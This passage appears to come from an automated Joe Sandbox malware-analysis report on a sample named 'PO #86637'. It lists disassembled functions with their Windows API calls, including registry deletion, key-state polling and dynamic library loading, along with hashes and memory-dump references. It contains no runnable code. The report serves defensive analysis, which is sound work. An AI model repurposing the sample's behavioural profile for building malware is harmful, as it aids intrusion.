                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$Item$DrawInfoInsert
                      • String ID: 0
                      • API String ID: 3076010158-4108050209
                      • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                      • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                      • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                      • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                      Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                      • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$_memmove_wcslen
                      • String ID: ComboBox$ListBox
                      • API String ID: 1589278365-1403004172
                      • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                      • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                      • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                      • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                      Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Handle
                      • String ID: nul
                      • API String ID: 2519475695-2873401336
                      • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                      • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                      • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                      • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                      Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                      Download Yara Rule
                      APIs
                      • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Handle
                      • String ID: nul
                      • API String ID: 2519475695-2873401336
                      • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                      • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                      • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                      • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                      Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • _wcsncpy.LIBCMT ref: 00401C41
                      • _wcscpy.LIBCMT ref: 00401C5D
                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                      • String ID: Line:
                      • API String ID: 1874344091-1585850449
                      • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                      • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                      • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                      • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                      Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID: SysAnimate32
                      • API String ID: 0-1011021900
                      • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                      • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                      • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                      • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                      Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                        • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                        • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                        • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                      • GetFocus.USER32 ref: 0046157B
                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                      • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                      • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                      • __swprintf.LIBCMT ref: 00461608
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                      • String ID: %s%d
                      • API String ID: 2645982514-1110647743
                      • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                      • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                      • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                      • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                      Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                      • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                      • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                      • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                      Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                      • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Process$CloseCountersCurrentHandleOpen
                      • String ID:
                      • API String ID: 3488606520-0
                      • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                      • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                      • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                      • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                      Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ConnectRegistry_memmove_wcslen
                      • String ID:
                      • API String ID: 15295421-0
                      • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                      • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                      • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                      • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                      Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                      • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                      • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressProc$Library$FreeLoad
                      • String ID:
                      • API String ID: 2449869053-0
                      • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                      • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                      • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                      • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                      Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetCursorPos.USER32(?), ref: 004563A6
                      • ScreenToClient.USER32(?,?), ref: 004563C3
                      • GetAsyncKeyState.USER32(?), ref: 00456400
                      • GetAsyncKeyState.USER32(?), ref: 00456410
                      • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AsyncState$ClientCursorLongScreenWindow
                      • String ID:
                      • API String ID: 3539004672-0
                      • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                      • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                      • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                      • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                      Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                      Download Yara Rule
                      APIs
                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                      • Sleep.KERNEL32(0000000A), ref: 0047D455
                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Interlocked$DecrementIncrement$Sleep
                      • String ID:
                      • API String ID: 327565842-0
                      • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                      • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                      • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                      • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                      Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                      Download Yara Rule
                      APIs
                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: PrivateProfile$SectionWrite$String
                      • String ID:
                      • API String ID: 2832842796-0
                      • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                      • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                      • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                      • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                      Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                      • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Enum$CloseDeleteOpen
                      • String ID:
                      • API String ID: 2095303065-0
                      • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                      • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                      • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                      • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                      Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                      Download Yara Rule
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00436A24
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
